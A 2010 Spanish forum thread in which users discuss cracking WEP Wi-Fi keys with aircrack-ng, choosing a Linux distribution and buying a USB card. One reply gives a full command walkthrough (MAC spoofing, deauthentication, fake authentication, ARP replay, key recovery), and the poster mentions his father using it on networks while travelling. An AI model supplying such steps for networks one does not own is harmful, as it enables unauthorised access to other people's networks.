varias dudas crack WEP y tarjeta para auditoría

Foro sobre todo tipo de tecnologías Wireless: Wi-Fi, Bluetooth, IrDA

Moderador: Moderadores

varias dudas crack WEP y tarjeta para auditoría

Notapor javiers » Jue Jul 29, 2010 7:28 pm

Hola a todos!.

Es mi primer post y soy nuevo en esto así que no seáis muy crueles :D.

1. Crack Wep

Estoy experimentando con el arte del crackeo WEP siguiendo un buen manual disponible en la Web e aircrack: http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

El ataque es sencillo hasta para mí, asociarse con el AP, inyectar con aireplay solicitudes ARP y generar datos a lo bestia para romperlos con aircrack.

El caso es que los tests de inyección de la tarjeta (cuando la pongo en modo monitor) funcionan bien, pero aun asociándome al AP, no inyecta en el mismo paquetes nunca, nunca, nunca...:

Saving ARP requests in replay_arp-0729-192122.cap
You should also start airodump-ng to capture replies.
^Cad 2037 packets (got 0 ARP requests and 7 ACKs), sent 0 packets...(0 pps)


Y el caso es que el chip que lleva esta tarjeta (Ralink, es un RT2571WF que es lo mismo que un RT73) está perfectamente soportado por aircrack.

Sospecho que el NetworkManager de Ubuntu puede estar interfiriendo por algunso posts que he leído por ahí, pero no lo tengo claro.

Lo que me lleva a 2:

2. Distribución a Usar


¿Alguna distribución de Linux recomendada para estos menesteres?. Yo uso Ubuntu por mera comodidad

3. Tarjeta a comprar.

La verdad es que la tarjeta que uso es de calidad poco fiabley estoy buscando una mejor y bien soportada. Tiene que ser USB.

He visto algunas en http://www.comprawifi.com/ que tienen buena pinta, pero estaré encantado de recibir opiniones.

Un saludo y gracias de antemano.
The only way of finding the limits of the possible is by going beyond them into the impossible // Arthur C. Clarke
Avatar de Usuario
javiers
:-)
:-)
 
Mensajes: 4
Registrado: Jue Jul 29, 2010 7:15 pm

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor vlan7 » Jue Jul 29, 2010 9:06 pm

Buenas,

Suponiendo que estas digamos en la subred 192.168.1.0/24 , puedes forzar al AP a generar un paquete ARP haciendo ping a una IP inexistente en la subred. Esto provocara un broadcast ARP lanzado por el AP.

Suerte,
There is a crack, a crack in everything That's how the light gets in. -subculture

zen7.vlan7.org
Avatar de Usuario
vlan7
<|:-D
<|:-D
 
Mensajes: 1176
Registrado: Dom Mar 05, 2006 11:16 pm
Ubicación: Mas alla del EIP

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor javiers » Jue Jul 29, 2010 11:50 pm

Hola vlan7,

Gracias, aunque esa prueba ya la había hecho porque lo indican en el wiki de aircrack. Soy de esos que se leen la documentación!

Un saludo.
The only way of finding the limits of the possible is by going beyond them into the impossible // Arthur C. Clarke
Avatar de Usuario
javiers
:-)
:-)
 
Mensajes: 4
Registrado: Jue Jul 29, 2010 7:15 pm

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor cirus » Vie Jul 30, 2010 8:40 am

Yo las crakeo siempre con ubuntu y no tengo problemas, me compre una tarjeta usb pedorra de 20 euros (hace 2 años) es una conceptronic c54ru Imagen no es muy potente pero trabaja bien...
hace tiempo mi padre me pidio que el tambien queria crackear weps cuando estaba de viaje le hice un "Tutorial" para hacerlo con la distro backtrack4

Código: Seleccionar todo
Con backtrack 4:

arrancamos la distro desde CD (depende el pc..)

User: root
password:toor

// subir interface
abrimos consola
#ifconfig wlanX up (X = normalmente 1)
//bajamos interface para cambiar la direccion mac
#macchanger -r wlan1 (cambia nuestra direccion mac)
// subimos interface
#ifconfig wlan1 up

//--Todo listo empezamos
/----------------------------------------------
desde nuestro linux con aircrack instlado (esta en los repositos ubuntu)

airmon-ng start (interface mia)
airodump-ng mon0 (snifa conxiones)
airodump-ng -c (canal) --bssid (MAC del router) -w nombre mon0


otra terminal


aireplay-ng -0 10 -a (mac router) -c (Mac estacion) mon0 (opcional esto lo que hace es desincronizar la estacion con el router para que al reconectarse tire mas paquetes con contraseña wep)
aireplay-ng -1 0 -o 1 -a (mac router) -h (Mac estacion ) mon0
(mac mia en lugar estacion)
----------------------------------------------------
aireplay-ng -1 0 -o 1 -e ( essid) -b (mac router) -h (Mac estacion )
mon0

aireplay-ng -3 -b (Mac router) -h (mac estacion / mia) mon0

---------------
otra terminal directorio terminal 1

aircrack-ng -b (mac router) nombre-01.cap



No pongo explicacion tecnica no tengo tiempo pero si lo sigues te saldra.... le ha salido a mi padre conque....
Me encanta el sonido del SAI por la mañana!!!
Imagen
Imagen
Avatar de Usuario
cirus
:-D
:-D
 
Mensajes: 132
Registrado: Sab Sep 02, 2006 6:19 pm
Ubicación: BcN

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor javiers » Vie Jul 30, 2010 9:39 am

Hola Cirus,

Gracias, pero ayer antes de leer tu post ya alcancé el hito: mi primera WEP crackeada. Desconozco porqué pero en algunos casos inyecta y en otros no. Creo que tiene que ver con la autenticación, a veces tengo que lanzarla varias veces hasta que el AP objetivo se dé por aludido.

También puede que tenga que ver con la señal...

De todas formas no hay mejor forma de comprobarlo que con un router con WEP propio. Esta semana me hago con uno en el trabajo y me dedicaré a bombardearlo de todas las maneras posibles. Así seguro que no hay problemas de cobertura...cuando tenga unas pocas tablas más compraré una tarjeta con mayor alcance. O me haré un cañón con una lata de pringles XD.

Un saludo y gracias a todos.
The only way of finding the limits of the possible is by going beyond them into the impossible // Arthur C. Clarke
Avatar de Usuario
javiers
:-)
:-)
 
Mensajes: 4
Registrado: Jue Jul 29, 2010 7:15 pm

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor wearth » Sab Jul 31, 2010 6:41 pm

Buenas!!

Yo para esos menesteres utilizo Wifislax o en su defecto Backtrack. Casi siempre opto por la primera por el idioma (Wifis está en español no? )

Enhorabuena con el crackeo! Te servirá para no utilizar NUNCA WEP.. a no ser que quieras cazar "piratillas" :P

Saludos
"Cuando el carro se haya roto, muchos os dirán por donde no se debía de pasar.."
wearth
<|:-)
<|:-)
 
Mensajes: 358
Registrado: Sab Dic 01, 2007 10:52 am

Re: varias dudas crack WEP y tarjeta para auditoría

Notapor AnimAlf » Lun Oct 04, 2010 9:47 am

Hola :)) verás ... si puedes asociarte, puedes inyectar. Genera tráfico con los ataques 5 y 6.

SaludOS
En busca del TuXeR perdido
Avatar de Usuario
AnimAlf
<|:-)
<|:-)
 
Mensajes: 628
Registrado: Mar Ago 08, 2006 4:54 am
Ubicación: tgn


Volver a Zona Inalámbrica

¿Quién está conectado?

Usuarios navegando por este Foro: No hay usuarios registrados visitando el Foro y 1 invitado

cron